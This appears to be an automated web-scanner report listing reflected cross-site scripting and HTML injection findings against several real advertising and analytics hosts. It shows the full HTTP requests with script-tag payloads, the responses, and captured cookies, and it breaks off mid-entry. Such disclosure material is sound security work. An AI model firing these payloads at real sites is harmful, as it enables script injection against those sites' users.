GET /csscca77"><a>c294b5ef411/ie6.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:00:57 GMT Content-Length: 7345 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 494db"><a>6e7eb28cf72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie6.css494db"><a>6e7eb28cf72 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Tue, 08 Mar 2011 12:01:06 GMT Content-Length: 17333 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48324"><a>c25c764c259 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css48324"><a>c25c764c259/ie7.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:00:58 GMT Content-Length: 7345 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed0b"><a>317e5feaa62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie7.cssaed0b"><a>317e5feaa62 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Tue, 08 Mar 2011 12:01:06 GMT Content-Length: 17337 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad56"><a>19b70861037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css3ad56"><a>19b70861037/screen-optimized.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:09 GMT Content-Length: 7366 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9d"><a>c0abe3b0a1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css/screen-optimized.css15e9d"><a>c0abe3b0a1c HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:14 GMT Content-Length: 7366 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db870"><a>fdae50e431d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /jsdb870"><a>fdae50e431d/concat.js HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:10 GMT Content-Length: 7346 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2875a"><a>d3812daf843 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js/concat.js2875a"><a>d3812daf843 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:18 GMT Content-Length: 15188 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1ac8a<script>alert(1)</script>d2fe5350c6d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /url/shares.json?url=http%3A%2F%2Fwww.metrolyrics.com%2F&callback=_ate.cbs.sc_httpwwwmetrolyricscom1ac8a<script>alert(1)</script>d2fe5350c6d HTTP/1.1 Host: api-public.addthis.com Proxy-Connection: keep-alive Referer: http://www.metrolyrics.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; uid=4d5af32c71c2e1a5; psc=6
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=300 Content-Type: application/javascript;charset=UTF-8 Date: Mon, 07 Mar 2011 00:56:15 GMT Content-Length: 91 Connection: close
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload ec0bc<script>alert(1)</script>d87256e279b was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=bCKmweipCYuVeaSOoxswed9Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYRQ5ASb5kMise8Pxt51dGGWc8QDWgjPLhdOG36lSisWrtgLaaSVnj2fdRBcVnCpgzxiiGG36lSisWrtgKQAGh0CtrorNnZzJ6mTbYtlIspvrRHB8bzYus0MO9AJQ9klML90GpK80xK9r5TpCeAipqZpPwjKnistQch1TtSdCipN6mK3CUii1HWejxSM8P3E9CsIyx2KVipBsQrpnSjb2ENNS7GUK75TS3bJ0RsLv7isbmBSYVr2mcVbHisJ6ipYWnnQcsOceLYL7xBRFxKFdLqmZqVuCxNVxR9ESVdFipXOuvVwW11pRw3kybarrhisjKIfUU0elPDSis2guzkT2eqhlmJEDBn8LipG8voHPDPbDLax1KKSKoPv3akGJg07Xisj9z1YKu1NBis8T7j4VRMZDSux1LRdbvQME7fb528daHNJfkisPgGK2RSvdeUD9bvQME7fb520g33buvrQmtDwJR0SvlcgxOZOtWnisXSxxMhQn4sBPBisTo4YEiiYHam60Lr24SUTAXbskI6KiiPUqFH1r2Q7eRaFl39q8flhoInmtRaNDMdjO4e7XqdIDERIqPwhcbmvmZOisnclRRmEpGr0KwjLHYpX4NWnck1gtWcIXXLqdtszoE70KwjLHYpX4F8pJFEZG8Dt2Pkc1sv6c5ZV6jeN2HpSfUPZJTCisdBqSvNMSvaipU6QngPqmaT8Iyp5qkRIUt1qGDVcfhLmRsZN0mIUUYBnO5VrNlR3nLMBjv5Kebnoduipu3siiUTre1TcZmx61isSNkyistxBvtcbxUrwAipNN9QFd9eD26isip5kQtBufiibtDMd597JLLch9l6mETTwUEiiPsHLVMTFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipZHRipYhdFhisisWA5B16a2n9eG5TUT1qeCdvJtyU5Mwis1R9XDEmr4jQn0xip0wxgMqQ3dfX5RnYEo6pZ59VsULAqst2zss8e5HZ4551FBngKH7AQJipLd4ekU1f7MrQxrTtB1Wxn268X1nippZxuFiiipNVtwB9MTZe7RE8f0iiJGJJOisFTGPnsMVZAvvYDODnXavvaWQgiszEc0Q0ChKpQiiHyBP6e0UwPekkdYKGOaFvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMfafI0saipfrtrZCipo8J7yKXisxNzbgXQvQ3ldWQZHY4kmra7WMngtuLhwCjTiioIip4aU3X1MNZy9nc9A8jsKZSw8DO8jmWc9UzGfccMWY4JCgIlY6fU8ucsHAie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Mon, 07 Mar 2011 01:39:55 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 84 Connection: keep-alive
Unknown API key: (8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b)
The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 5c7fd<script>alert(1)</script>bf08636ce95 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=5c7fd<script>alert(1)</script>bf08636ce95 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=bCKmweipCYuVeaSOoxswed9Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYRQ5ASb5kMise8Pxt51dGGWc8QDWgjPLhdOG36lSisWrtgLaaSVnj2fdRBcVnCpgzxiiGG36lSisWrtgKQAGh0CtrorNnZzJ6mTbYtlIspvrRHB8bzYus0MO9AJQ9klML90GpK80xK9r5TpCeAipqZpPwjKnistQch1TtSdCipN6mK3CUii1HWejxSM8P3E9CsIyx2KVipBsQrpnSjb2ENNS7GUK75TS3bJ0RsLv7isbmBSYVr2mcVbHisJ6ipYWnnQcsOceLYL7xBRFxKFdLqmZqVuCxNVxR9ESVdFipXOuvVwW11pRw3kybarrhisjKIfUU0elPDSis2guzkT2eqhlmJEDBn8LipG8voHPDPbDLax1KKSKoPv3akGJg07Xisj9z1YKu1NBis8T7j4VRMZDSux1LRdbvQME7fb528daHNJfkisPgGK2RSvdeUD9bvQME7fb520g33buvrQmtDwJR0SvlcgxOZOtWnisXSxxMhQn4sBPBisTo4YEiiYHam60Lr24SUTAXbskI6KiiPUqFH1r2Q7eRaFl39q8flhoInmtRaNDMdjO4e7XqdIDERIqPwhcbmvmZOisnclRRmEpGr0KwjLHYpX4NWnck1gtWcIXXLqdtszoE70KwjLHYpX4F8pJFEZG8Dt2Pkc1sv6c5ZV6jeN2HpSfUPZJTCisdBqSvNMSvaipU6QngPqmaT8Iyp5qkRIUt1qGDVcfhLmRsZN0mIUUYBnO5VrNlR3nLMBjv5Kebnoduipu3siiUTre1TcZmx61isSNkyistxBvtcbxUrwAipNN9QFd9eD26isip5kQtBufiibtDMd597JLLch9l6mETTwUEiiPsHLVMTFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipZHRipYhdFhisisWA5B16a2n9eG5TUT1qeCdvJtyU5Mwis1R9XDEmr4jQn0xip0wxgMqQ3dfX5RnYEo6pZ59VsULAqst2zss8e5HZ4551FBngKH7AQJipLd4ekU1f7MrQxrTtB1Wxn268X1nippZxuFiiipNVtwB9MTZe7RE8f0iiJGJJOisFTGPnsMVZAvvYDODnXavvaWQgiszEc0Q0ChKpQiiHyBP6e0UwPekkdYKGOaFvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMfafI0saipfrtrZCipo8J7yKXisxNzbgXQvQ3ldWQZHY4kmra7WMngtuLhwCjTiioIip4aU3X1MNZy9nc9A8jsKZSw8DO8jmWc9UzGfccMWY4JCgIlY6fU8ucsHAie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Mon, 07 Mar 2011 01:41:04 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 58 Connection: keep-alive
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b0c8a<a>3637f5c2d52 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /viapi?action=pixel&id=f9622925b0c8a<a>3637f5c2d52 HTTP/1.1 Host: api.dimestore.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pixel_d51770430=1
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f092f<script>alert(1)</script>49bca32207c was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf092f<script>alert(1)</script>49bca32207c&n=ar_int_p84053757&1299459393565 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Homepage&placement=MW_HOME_300_TOP&groupid=5557007329&quantseg= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 00:55:55 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload c534e<script>alert(1)</script>d15bf7170c1 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8c534e<script>alert(1)</script>d15bf7170c1&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:03 GMT Date: Mon, 07 Mar 2011 01:47:03 GMT Connection: close Content-Length: 3594
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 75841<script>alert(1)</script>a90132d1976 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=321281375841<script>alert(1)</script>a90132d1976&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:09 GMT Date: Mon, 07 Mar 2011 01:47:09 GMT Connection: close Content-Length: 3594
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload beb29<script>alert(1)</script>35101d2c181 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15=beb29<script>alert(1)</script>35101d2c181 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:10 GMT Date: Mon, 07 Mar 2011 01:47:10 GMT Connection: close Content-Length: 3594
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fdeb6<script>alert(1)</script>18adce1c522 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404fdeb6<script>alert(1)</script>18adce1c522&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:04 GMT Date: Mon, 07 Mar 2011 01:47:04 GMT Connection: close Content-Length: 3594
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 99c56<script>alert(1)</script>ef484687d18 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=1599c56<script>alert(1)</script>ef484687d18&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:05 GMT Date: Mon, 07 Mar 2011 01:47:05 GMT Connection: close Content-Length: 3594
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 919e4<script>alert(1)</script>921de2591d1 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005919e4<script>alert(1)</script>921de2591d1&c5=&c6=&c10=3212813&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:06 GMT Date: Mon, 07 Mar 2011 01:47:06 GMT Connection: close Content-Length: 3594
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ba08c<script>alert(1)</script>3eeb0c57d13 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
